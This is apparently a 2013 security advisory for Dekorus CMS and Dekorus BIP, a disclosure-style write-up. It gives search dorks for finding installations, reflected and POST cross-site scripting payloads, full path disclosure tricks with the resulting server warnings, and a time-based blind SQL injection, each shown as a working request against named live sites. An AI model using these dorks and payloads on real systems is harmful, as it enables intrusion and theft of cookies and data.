Dekorus CMS & Dekorus BIP Multiple Vulnerabilities

2013.11.10
Credit: Smash_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

Title: Dekorus CMS & Dekorus BIP Multiple Vulnerabilities
Vendor: dekorus.com.pl
Dork: inurl:"by Dekorus" OR inurl:"/content.php?mod=" OR intext:"dekorus.com.pl" OR inurl:"content.php?sid=" OR inurl:"cms_id=" AND intext:"dekorus" (use your imagination)
Date: 09.11.13
Contact: smash [at] devilteam.pl

1. Cross Site Scripting

Affected GET parameters (reflected unencoded into the page): cms_id= sid= mod= y= mt= kat= m_id= tr= lang= page= and probably more.

PoC:
http://pawelsuski.pl/content.php?sid=&tr=cl&cms_id=752&m_id=752&kat=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ateny.zwa.pl/content.php?sid=&tr=cl%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&cms_id=69&m_id=69&kat=

2. Full Path Disclosure

Each case below provokes a PHP warning that prints the absolute filesystem path of the script. This only works while the target has display_errors enabled, which all of the tested hosts did.

a) Search form FPD
The search term is used directly as an eregi() pattern, so an unbalanced bracket makes the regex compiler emit a warning.
POST q=[]
PoC: http://www.dekorus.com.pl/content.php
POST - q=[]
Warning: eregi() [function.eregi]: REG_EBRACK in /home/dekorus/WWW/d/dekorus.com.pl/content.php on line 972

b) Photo inclusion FPD
GET /cms_inc/cms_galeria_show.php?foto=http:/
PoC: http://ateny.zwa.pl/cms_inc/cms_galeria_show.php?foto=http:/
Warning: Cannot modify header information - headers already sent by (output started at /home/dekorus/WWW/domeny/a/ateny.zwa.pl/cms_inc/cms_galeria_show.php:8) in /home/dekorus/WWW/domeny/a/ateny.zwa.pl/cms_config/admin_config.php on line 149

c) Admin panel FPD
Submitting the login fields as arrays (ver_login[]=, ver_password[]=) instead of strings makes md5() and crypt() emit type warnings before the redirect is sent.
/cms_admin/cms_zaloguj.php
POST - ver_login[]=1&ver_password[]=2
PoC: http://www.dekorus.com.pl/cms_admin/cms_zaloguj.php
Warning: md5() expects parameter 1 to be string, array given in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 49
Warning: crypt() expects parameter 2 to be string, array given in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 49
Warning: Cannot modify header information - headers already sent by (output started at /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php:49) in /home/dekorus/WWW/d/dekorus.com.pl/cms_inc/user_wer.php on line 80

3. Dekorus BIP Blind SQL Injection

(For the BIP dork you will need to add inurl:bip)
host/content.php?cms_id=[SQLi]
The injection is time-based: when the injected sleep() executes, the response is delayed by the requested number of seconds, and no query output is reflected into the page.
PoC: http://bip.pwsz.eu/content.php?cms_id=280+and+sleep%2810%29--

4. Dekorus BIP POST XSS

/sprawa.php
POST - "><script>alert(document.cookie)</script>


Copyright 2024, cxsecurity.com